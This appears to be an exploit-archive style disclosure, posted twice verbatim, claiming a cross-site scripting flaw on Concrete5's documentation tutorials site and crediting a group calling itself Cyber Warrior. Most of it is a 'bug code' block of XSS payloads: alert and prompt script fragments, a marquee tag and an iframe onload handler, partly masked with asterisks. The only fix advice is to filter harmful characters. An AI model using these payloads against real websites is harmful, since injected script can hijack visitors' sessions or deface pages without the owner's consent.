<------------------- header data start ------------------- >
# Application Name : Concrete5 XSS Vuln.
# Vulnerable Type : Cross-Site Scripting
# Bug Fix Advice : Harmful characters can be filtered out.
# Vendor Homepage : https://www.concrete5.org
# Author : Cyber Warrior | Bug Researchers Group | AaCcTt
# Author Contact : http://www.Cyber-warrior.org/198620
# Target :http://documentation.concrete5.org/tutorials
< ------------------- / header data end of ------------------- >
< -- bug code start -- >
<marquee>Cyber WARRİOR BUG RES. - AaCcTt<marquee>
>**********alert(Cyber WARRİOR BUG RES. - AaCcTt)</script>
></script>**********prompt(Cyber WARRİOR BUG RES. - AaCcTt)</script>
><iframe onload=alert(/Cyber WARRİOR BUG RES. - AaCcTt/)>
< -- / bug code end of -- >
# Application Name : Concrete5 XSS Vuln.
# Vulnerable Type : Cross-Site Scripting
# Bug Fix Advice : Harmful characters can be filtered out.
# Vendor Homepage : https://www.concrete5.org
# Author : Cyber Warrior | Bug Researchers Group | AaCcTt
# Author Contact : http://www.Cyber-warrior.org/198620
# Target :http://documentation.concrete5.org/tutorials
< ------------------- / header data end of ------------------- >
< -- bug code start -- >
<marquee>Cyber WARRİOR BUG RES. - AaCcTt<marquee>
>**********alert(Cyber WARRİOR BUG RES. - AaCcTt)</script>
></script>**********prompt(Cyber WARRİOR BUG RES. - AaCcTt)</script>
><iframe onload=alert(/Cyber WARRİOR BUG RES. - AaCcTt/)>
< -- / bug code end of -- >